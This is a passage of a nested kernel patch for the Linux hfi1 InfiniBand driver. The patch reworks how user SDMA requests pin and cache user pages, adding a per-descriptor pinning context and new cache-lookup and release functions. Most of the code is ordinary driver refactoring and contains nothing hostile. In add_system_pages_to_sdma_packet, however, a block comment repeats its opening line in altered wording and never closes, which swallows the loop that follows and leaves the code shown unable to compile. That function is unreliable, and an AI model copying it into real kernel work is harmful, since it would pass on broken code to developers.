+- * 'node'.
+- */
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *node)
+-{
+-	unsigned long flags;
+-
+-	if (current->mm != handler->mn.mm)
+-		return;
+-
+-	/* Validity of handler and node pointers has been checked by caller. */
+-	trace_hfi1_mmu_rb_remove(node->addr, node->len);
+-	spin_lock_irqsave(&handler->lock, flags);
+-	__mmu_int_rb_remove(node, &handler->root);
+-	list_del(&node->list); /* remove from LRU list */
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-
+-	handler->ops->remove(handler->ops_arg, node);
+-}
+-
+ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		const struct mmu_notifier_range *range)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index 7417be2b9dc8a..ed75acdb7b839 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -52,10 +52,8 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *mnode);
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node);
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr,
++					  unsigned long len);
+ 
+ #endif /* _HFI1_MMU_RB_H */
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 8ed20392e9f0d..bb2552dd29c1e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,22 +1593,7 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	}
++	system_descriptor_complete(dd, descp);
+ }
+ 
+ /*
+@@ -3128,7 +3113,7 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+ 					 addr, tx->tlen);
+ 	}
+ 
+@@ -3167,10 +3152,12 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 			return rval;
+ 		}
+ 	}
++
+ 	/* finish the one just added */
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
++		NULL,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
+ 	tx->num_desc++;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index b023fc461bd51..95aaec14c6c28 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,6 +594,7 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
++	void *pinning_ctx,
+ 	dma_addr_t addr,
+ 	size_t len)
+ {
+@@ -612,6 +613,7 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++	desc->pinning_ctx = pinning_ctx;
+ }
+ 
+ /* helper to extend txreq */
+@@ -643,6 +645,7 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+ 	u16 len)
+@@ -652,6 +655,7 @@ static inline int _sdma_txadd_daddr(
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
++		pinning_ctx,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+@@ -672,6 +676,7 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
++ * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+@@ -687,6 +692,7 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+@@ -714,8 +720,7 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_PAGE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
+ }
+ 
+ /**
+@@ -749,7 +754,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
++				 addr, len);
+ }
+ 
+ /**
+@@ -795,8 +801,7 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_SINGLE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
+ }
+ 
+ struct iowait_work;
+@@ -1030,4 +1035,5 @@ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+ 
++void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index e262fb5c5ec61..fad946cb5e0d8 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -19,6 +19,7 @@
+ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
++	void *pinning_ctx;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/trace_mmu.h b/drivers/infiniband/hw/hfi1/trace_mmu.h
+index 187e9244fe5ed..57900ebb7702e 100644
+--- a/drivers/infiniband/hw/hfi1/trace_mmu.h
++++ b/drivers/infiniband/hw/hfi1/trace_mmu.h
+@@ -37,10 +37,6 @@ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_search,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+ 
+-DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_remove,
+-	     TP_PROTO(unsigned long addr, unsigned long len),
+-	     TP_ARGS(addr, len));
+-
+ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_mem_invalidate,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index a71c5a36cebab..ae58b48afe074 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -24,7 +24,6 @@
+ 
+ #include "hfi.h"
+ #include "sdma.h"
+-#include "mmu_rb.h"
+ #include "user_sdma.h"
+ #include "verbs.h"  /* for the headers */
+ #include "common.h" /* for struct hfi1_tid_info */
+@@ -39,11 +38,7 @@ static unsigned initial_pkt_count = 8;
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts);
+ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status);
+ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq);
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin);
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec);
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages);
++static void user_sdma_free_request(struct user_sdma_request *req);
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen);
+@@ -81,6 +76,11 @@ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.invalidate = sdma_rb_invalidate
+ };
+ 
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_remaining);
++
+ static int defer_packet_queue(
+ 	struct sdma_engine *sde,
+ 	struct iowait_work *wait,
+@@ -410,6 +410,7 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		ret = -EINVAL;
+ 		goto free_req;
+ 	}
++
+ 	/* Copy the header from the user buffer */
+ 	ret = copy_from_user(&req->hdr, iovec[idx].iov_base + sizeof(info),
+ 			     sizeof(req->hdr));
+@@ -484,9 +485,8 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		memcpy(&req->iovs[i].iov,
+ 		       iovec + idx++,
+ 		       sizeof(req->iovs[i].iov));
+-		ret = pin_vector_pages(req, &req->iovs[i]);
+-		if (ret) {
+-			req->data_iovs = i;
++		if (req->iovs[i].iov.iov_len == 0) {
++			ret = -EINVAL;
+ 			goto free_req;
+ 		}
+ 		req->data_len += req->iovs[i].iov.iov_len;
+@@ -584,7 +584,7 @@ free_req:
+ 		if (req->seqsubmitted)
+ 			wait_event(pq->busy.wait_dma,
+ 				   (req->seqcomp == req->seqsubmitted - 1));
+-		user_sdma_free_request(req, true);
++		user_sdma_free_request(req);
+ 		pq_update(pq);
+ 		set_comp_state(pq, cq, info.comp_idx, ERROR, ret);
+ 	}
+@@ -696,48 +696,6 @@ static int user_sdma_txadd_ahg(struct user_sdma_request *req,
+ 	return ret;
+ }
+ 
+-static int user_sdma_txadd(struct user_sdma_request *req,
+-			   struct user_sdma_txreq *tx,
+-			   struct user_sdma_iovec *iovec, u32 datalen,
+-			   u32 *queued_ptr, u32 *data_sent_ptr,
+-			   u64 *iov_offset_ptr)
+-{
+-	int ret;
+-	unsigned int pageidx, len;
+-	unsigned long base, offset;
+-	u64 iov_offset = *iov_offset_ptr;
+-	u32 queued = *queued_ptr, data_sent = *data_sent_ptr;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	base = (unsigned long)iovec->iov.iov_base;
+-	offset = offset_in_page(base + iovec->offset + iov_offset);
+-	pageidx = (((iovec->offset + iov_offset + base) - (base & PAGE_MASK)) >>
+-		   PAGE_SHIFT);
+-	len = offset + req->info.fragsize > PAGE_SIZE ?
+-		PAGE_SIZE - offset : req->info.fragsize;
+-	len = min((datalen - queued), len);
+-	ret = sdma_txadd_page(pq->dd, &tx->txreq, iovec->pages[pageidx],
+-			      offset, len);
+-	if (ret) {
+-		SDMA_DBG(req, "SDMA txreq add page failed %d\n", ret);
+-		return ret;
+-	}
+-	iov_offset += len;
+-	queued += len;
+-	data_sent += len;
+-	if (unlikely(queued < datalen && pageidx == iovec->npages &&
+-		     req->iov_idx < req->data_iovs - 1)) {
+-		iovec->offset += iov_offset;
+-		iovec = &req->iovs[++req->iov_idx];
+-		iov_offset = 0;
+-	}
+-
+-	*queued_ptr = queued;
+-	*data_sent_ptr = data_sent;
+-	*iov_offset_ptr = iov_offset;
+-	return ret;
+-}
+-
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ {
+ 	int ret = 0;
+@@ -769,8 +727,7 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 		maxpkts = req->info.npkts - req->seqnum;
+ 
+ 	while (npkts < maxpkts) {
+-		u32 datalen = 0, queued = 0, data_sent = 0;
+-		u64 iov_offset = 0;
++		u32 datalen = 0;
+ 
+ 		/*
+ 		 * Check whether any of the completions have come back
+@@ -863,27 +820,17 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 				goto free_txreq;
+ 		}
+ 
+-		/*
+-		 * If the request contains any data vectors, add up to
+-		 * fragsize bytes to the descriptor.
+-		 */
+-		while (queued < datalen &&
+-		       (req->sent + data_sent) < req->data_len) {
+-			ret = user_sdma_txadd(req, tx, iovec, datalen,
+-					      &queued, &data_sent, &iov_offset);
+-			if (ret)
+-				goto free_txreq;
+-		}
+-		/*
+-		 * The txreq was submitted successfully so we can update
+-		 * the counters.
+-		 */
+ 		req->koffset += datalen;
+ 		if (req_opcode(req->info.ctrl) == EXPECTED)
+ 			req->tidoffset += datalen;
+-		req->sent += data_sent;
+-		if (req->data_len)
+-			iovec->offset += iov_offset;
++		req->sent += datalen;
++		while (datalen) {
++			ret = add_system_pages_to_sdma_packet(req, tx, iovec,
++							      &datalen);
++			if (ret)
++				goto free_txreq;
++			iovec = &req->iovs[req->iov_idx];
++		}
+ 		list_add_tail(&tx->txreq.list, &req->txps);
+ 		/*
+ 		 * It is important to increment this here as it is used to
+@@ -920,133 +867,14 @@ free_tx:
+ static u32 sdma_cache_evict(struct hfi1_user_sdma_pkt_q *pq, u32 npages)
+ {
+ 	struct evict_data evict_data;
++	struct mmu_rb_handler *handler = pq->handler;
+ 
+ 	evict_data.cleared = 0;
+ 	evict_data.target = npages;
+-	hfi1_mmu_rb_evict(pq->handler, &evict_data);
++	hfi1_mmu_rb_evict(handler, &evict_data);
+ 	return evict_data.cleared;
+ }
+ 
+-static int pin_sdma_pages(struct user_sdma_request *req,
+-			  struct user_sdma_iovec *iovec,
+-			  struct sdma_mmu_node *node,
+-			  int npages)
+-{
+-	int pinned, cleared;
+-	struct page **pages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		return -ENOMEM;
+-	memcpy(pages, node->pages, node->npages * sizeof(*pages));
+-
+-	npages -= node->npages;
+-retry:
+-	if (!hfi1_can_pin_pages(pq->dd, current->mm,
+-				atomic_read(&pq->n_locked), npages)) {
+-		cleared = sdma_cache_evict(pq, npages);
+-		if (cleared >= npages)
+-			goto retry;
+-	}
+-	pinned = hfi1_acquire_user_pages(current->mm,
+-					 ((unsigned long)iovec->iov.iov_base +
+-					 (node->npages * PAGE_SIZE)), npages, 0,
+-					 pages + node->npages);
+-	if (pinned < 0) {
+-		kfree(pages);
+-		return pinned;
+-	}
+-	if (pinned != npages) {
+-		unpin_vector_pages(current->mm, pages, node->npages, pinned);
+-		return -EFAULT;
+-	}
+-	kfree(node->pages);
+-	node->rb.len = iovec->iov.iov_len;
+-	node->pages = pages;
+-	atomic_add(pinned, &pq->n_locked);
+-	return pinned;
+-}
+-
+-static void unpin_sdma_pages(struct sdma_mmu_node *node)
+-{
+-	if (node->npages) {
+-		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
+-				   node->npages);
+-		atomic_sub(node->npages, &node->pq->n_locked);
+-	}
+-}
+-
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec)
+-{
+-	int ret = 0, pinned, npages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-	struct sdma_mmu_node *node = NULL;
+-	struct mmu_rb_node *rb_node;
+-	struct iovec *iov;
+-	bool extracted;
+-
+-	extracted =
+-		hfi1_mmu_rb_remove_unless_exact(pq->handler,
+-						(unsigned long)
+-						iovec->iov.iov_base,
+-						iovec->iov.iov_len, &rb_node);
+-	if (rb_node) {
+-		node = container_of(rb_node, struct sdma_mmu_node, rb);
+-		if (!extracted) {
+-			atomic_inc(&node->refcount);
+-			iovec->pages = node->pages;
+-			iovec->npages = node->npages;
+-			iovec->node = node;
+-			return 0;
+-		}
+-	}
+-
+-	if (!node) {
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
+-		if (!node)
+-			return -ENOMEM;
+-
+-		node->rb.addr = (unsigned long)iovec->iov.iov_base;
+-		node->pq = pq;
+-		atomic_set(&node->refcount, 0);
+-	}
+-
+-	iov = &iovec->iov;
+-	npages = num_user_pages((unsigned long)iov->iov_base, iov->iov_len);
+-	if (node->npages < npages) {
+-		pinned = pin_sdma_pages(req, iovec, node, npages);
+-		if (pinned < 0) {
+-			ret = pinned;
+-			goto bail;
+-		}
+-		node->npages += pinned;
+-		npages = node->npages;
+-	}
+-	iovec->pages = node->pages;
+-	iovec->npages = npages;
+-	iovec->node = node;
+-
+-	ret = hfi1_mmu_rb_insert(req->pq->handler, &node->rb);
+-	if (ret) {
+-		iovec->node = NULL;
+-		goto bail;
+-	}
+-	return 0;
+-bail:
+-	unpin_sdma_pages(node);
+-	kfree(node);
+-	return ret;
+-}
+-
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages)
+-{
+-	hfi1_release_user_pages(mm, pages + start, npages, false);
+-	kfree(pages);
+-}
+-
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen)
+@@ -1388,7 +1216,7 @@ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status)
+ 	if (req->seqcomp != req->info.npkts - 1)
+ 		return;
+ 
+-	user_sdma_free_request(req, false);
++	user_sdma_free_request(req);
+ 	set_comp_state(pq, cq, req->info.comp_idx, state, status);
+ 	pq_update(pq);
+ }
+@@ -1399,10 +1227,8 @@ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq)
+ 		wake_up(&pq->wait);
+ }
+ 
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
++static void user_sdma_free_request(struct user_sdma_request *req)
+ {
+-	int i;
+-
+ 	if (!list_empty(&req->txps)) {
+ 		struct sdma_txreq *t, *p;
+ 
+@@ -1415,21 +1241,6 @@ static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
+ 		}
+ 	}
+ 
+-	for (i = 0; i < req->data_iovs; i++) {
+-		struct sdma_mmu_node *node = req->iovs[i].node;
+-
+-		if (!node)
+-			continue;
+-
+-		req->iovs[i].node = NULL;
+-
+-		if (unpin)
+-			hfi1_mmu_rb_remove(req->pq->handler,
+-					   &node->rb);
+-		else
+-			atomic_dec(&node->refcount);
+-	}
+-
+ 	kfree(req->tids);
+ 	clear_bit(req->info.comp_idx, req->pq->req_in_use);
+ }
+@@ -1447,6 +1258,368 @@ static inline void set_comp_state(struct hfi1_user_sdma_pkt_q *pq,
+ 					idx, state, ret);
+ }
+ 
++static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
++			       unsigned int start, unsigned int npages)
++{
++	hfi1_release_user_pages(mm, pages + start, npages, false);
++	kfree(pages);
++}
++
++static void free_system_node(struct sdma_mmu_node *node)
++{
++	if (node->npages) {
++		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
++				   node->npages);
++		atomic_sub(node->npages, &node->pq->n_locked);
++	}
++	kfree(node);
++}
++
++static inline void acquire_node(struct sdma_mmu_node *node)
++{
++	atomic_inc(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static inline void release_node(struct mmu_rb_handler *handler,
++				struct sdma_mmu_node *node)
++{
++	atomic_dec(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
++					      unsigned long start,
++					      unsigned long end)
++{
++	struct mmu_rb_node *rb_node;
++	struct sdma_mmu_node *node;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	rb_node = hfi1_mmu_rb_get_first(handler, start, (end - start));
++	if (!rb_node) {
++		spin_unlock_irqrestore(&handler->lock, flags);
++		return NULL;
++	}
++	node = container_of(rb_node, struct sdma_mmu_node, rb);
++	acquire_node(node);
++	spin_unlock_irqrestore(&handler->lock, flags);
++
++	return node;
++}
++
++static int pin_system_pages(struct user_sdma_request *req,
++			    uintptr_t start_address, size_t length,
++			    struct sdma_mmu_node *node, int npages)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	int pinned, cleared;
++	struct page **pages;
++
++	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
++	if (!pages)
++		return -ENOMEM;
++
++retry:
++	if (!hfi1_can_pin_pages(pq->dd, current->mm, atomic_read(&pq->n_locked),
++				npages)) {
++		SDMA_DBG(req, "Evicting: nlocked %u npages %u",
++			 atomic_read(&pq->n_locked), npages);
++		cleared = sdma_cache_evict(pq, npages);
++		if (cleared >= npages)
++			goto retry;
++	}
++
++	SDMA_DBG(req, "Acquire user pages start_address %lx node->npages %u npages %u",
++		 start_address, node->npages, npages);
++	pinned = hfi1_acquire_user_pages(current->mm, start_address, npages, 0,
++					 pages);
++
++	if (pinned < 0) {
++		kfree(pages);
++		SDMA_DBG(req, "pinned %d", pinned);
++		return pinned;
++	}
++	if (pinned != npages) {
++		unpin_vector_pages(current->mm, pages, node->npages, pinned);
++		SDMA_DBG(req, "npages %u pinned %d", npages, pinned);
++		return -EFAULT;
++	}
++	node->rb.addr = start_address;
++	node->rb.len = length;
++	node->pages = pages;
++	node->npages = npages;
++	atomic_add(pinned, &pq->n_locked);
++	SDMA_DBG(req, "done. pinned %d", pinned);
++	return 0;
++}
++
++static int add_system_pinning(struct user_sdma_request *req,
++			      struct sdma_mmu_node **node_p,
++			      unsigned long start, unsigned long len)
++
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	struct sdma_mmu_node *node;
++	int ret;
++
++	node = kzalloc(sizeof(*node), GFP_KERNEL);
++	if (!node)
++		return -ENOMEM;
++
++	node->pq = pq;
++	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
++	if (ret == 0) {
++		ret = hfi1_mmu_rb_insert(pq->handler, &node->rb);
++		if (ret)
++			free_system_node(node);
++		else
++			*node_p = node;
++
++		return ret;
++	}
++
++	kfree(node);
++	return ret;
++}
++
++static int get_system_cache_entry(struct user_sdma_request *req,
++				  struct sdma_mmu_node **node_p,
++				  size_t req_start, size_t req_len)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	u64 start = ALIGN_DOWN(req_start, PAGE_SIZE);
++	u64 end = PFN_ALIGN(req_start + req_len);
++	struct mmu_rb_handler *handler = pq->handler;
++	int ret;
++
++	if ((end - start) == 0) {
++		SDMA_DBG(req,
++			 "Request for empty cache entry req_start %lx req_len %lx start %llx end %llx",
++			 req_start, req_len, start, end);
++		return -EINVAL;
++	}
++
++	SDMA_DBG(req, "req_start %lx req_len %lu", req_start, req_len);
++
++	while (1) {
++		struct sdma_mmu_node *node =
++			find_system_node(handler, start, end);
++		u64 prepend_len = 0;
++
++		SDMA_DBG(req, "node %p start %llx end %llu", node, start, end);
++		if (!node) {
++			ret = add_system_pinning(req, node_p, start,
++						 end - start);
++			if (ret == -EEXIST) {
++				/*
++				 * Another execution context has inserted a
++				 * conflicting entry first.
++				 */
++				continue;
++			}
++			return ret;
++		}
++
++		if (node->rb.addr <= start) {
++			/*
++			 * This entry covers at least part of the region. If it doesn't extend
++			 * to the end, then this will be called again for the next segment.
++			 */
++			*node_p = node;
++			return 0;
++		}
++
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
++			 node->rb.addr, atomic_read(&node->refcount));
++		prepend_len = node->rb.addr - start;
++
++		/*
++		 * This node will not be returned; a new node will be
++		 * created and returned instead, so release the reference.
++		 */
++		release_node(handler, node);
++
++		/* Prepend a node to cover the beginning of the allocation */
++		ret = add_system_pinning(req, node_p, start, prepend_len);
++		if (ret == -EEXIST) {
++			/* Another execution context has inserted a conflicting entry first. */
++			continue;
++		}
++		return ret;
++	}
++}
++
++static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
++				      struct user_sdma_txreq *tx,
++				      struct sdma_mmu_node *cache_entry,
++				      size_t start,
++				      size_t from_this_cache_entry)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	unsigned int page_offset;
++	unsigned int from_this_page;
++	size_t page_index;
++	void *ctx;
++	int ret;
++
++	/*
++	 * Because the cache may be more fragmented than the memory that is being accessed,
++	 * it's not strictly necessary to have a descriptor per cache entry.
++	 */
++
++	while (from_this_cache_entry) {
++		page_index = PFN_DOWN(start - cache_entry->rb.addr);
++
++		if (page_index >= cache_entry->npages) {
++			SDMA_DBG(req,
++				 "Request for page_index %zu >= cache_entry->npages %u",
++				 page_index, cache_entry->npages);
++			return -EINVAL;
++		}
++
++		page_offset = start - ALIGN_DOWN(start, PAGE_SIZE);
++		from_this_page = PAGE_SIZE - page_offset;
++
++		if (from_this_page < from_this_cache_entry) {
++			ctx = NULL;
++		} else {
++			/*
++			 * When they are equal, the next line has no practical
++			 * effect, but a register-to-register copy is cheaper
++			 * than a conditional branch.
++			 */
++			from_this_page = from_this_cache_entry;
++			ctx = cache_entry;
++		}
++
++		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++				      cache_entry->pages[page_index],
++				      page_offset, from_this_page);
++		if (ret) {
++			/*
++			 * When there's a failure, the entire request is freed by
++			 * user_sdma_send_pkts().
++			 */
++			SDMA_DBG(req,
++				 "sdma_txadd_page failed %d page_index %lu page_offset %u from_this_page %u",
++				 ret, page_index, page_offset, from_this_page);
++			return ret;
++		}
++		start += from_this_page;
++		from_this_cache_entry -= from_this_page;
++	}
++	return 0;
++}
++
++static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   size_t from_this_iovec)
++{
++	struct mmu_rb_handler *handler = req->pq->handler;
++
++	while (from_this_iovec > 0) {
++		struct sdma_mmu_node *cache_entry;
++		size_t from_this_cache_entry;
++		size_t start;
++		int ret;
++
++		start = (uintptr_t)iovec->iov.iov_base + iovec->offset;
++		ret = get_system_cache_entry(req, &cache_entry, start,
++					     from_this_iovec);
++		if (ret) {
++			SDMA_DBG(req, "pin system segment failed %d", ret);
++			return ret;
++		}
++
++		from_this_cache_entry = cache_entry->rb.len - (start - cache_entry->rb.addr);
++		if (from_this_cache_entry > from_this_iovec)
++			from_this_cache_entry = from_this_iovec;
++
++		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
++						 from_this_cache_entry);
++		if (ret) {
++			/*
++			 * We're guaranteed that there will be no descriptor
++			 * completion callback that releases this node
++			 * because only the last descriptor referencing it
++			 * has a context attached, and a failure means the
++			 * last descriptor was never added.
++			 */
++			release_node(handler, cache_entry);
++			SDMA_DBG(req, "add system segment failed %d", ret);
++			return ret;
++		}
++
++		iovec->offset += from_this_cache_entry;
++		from_this_iovec -= from_this_cache_entry;
++	}
++
++	return 0;
++}
++
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_data_remaining)
++{
++	size_t remaining_to_add = *pkt_data_remaining;
++	/*
++	 * Walk through iovec entries, ensure the associated pages
++	 * Walk through the iovec entries, ensure the associated pages
++	 * are pinned and mapped, and add data to the packet until no
++	 * more data remains to be added.
++	while (remaining_to_add > 0) {
++		struct user_sdma_iovec *cur_iovec;
++		size_t from_this_iovec;
++		int ret;
++
++		cur_iovec = iovec;
++		from_this_iovec = iovec->iov.iov_len - iovec->offset;
++
++		if (from_this_iovec > remaining_to_add) {
++			from_this_iovec = remaining_to_add;
++		} else {
++			/* The current iovec entry will be consumed by this pass. */
++			req->iov_idx++;
++			iovec++;
++		}
++
++		ret = add_system_iovec_to_sdma_packet(req, tx, cur_iovec,
++						      from_this_iovec);
++		if (ret)
++			return ret;
++
++		remaining_to_add -= from_this_iovec;
++	}
++	*pkt_data_remaining = remaining_to_add;
++
++	return 0;
++}
++
++void system_descriptor_complete(struct hfi1_devdata *dd,
++				struct sdma_desc *descp)
++{
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx) {
++		struct sdma_mmu_node *node = descp->pinning_ctx;
++
++		release_node(node->rb.handler, node);
++	}
++}
++
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+@@ -1493,8 +1666,7 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
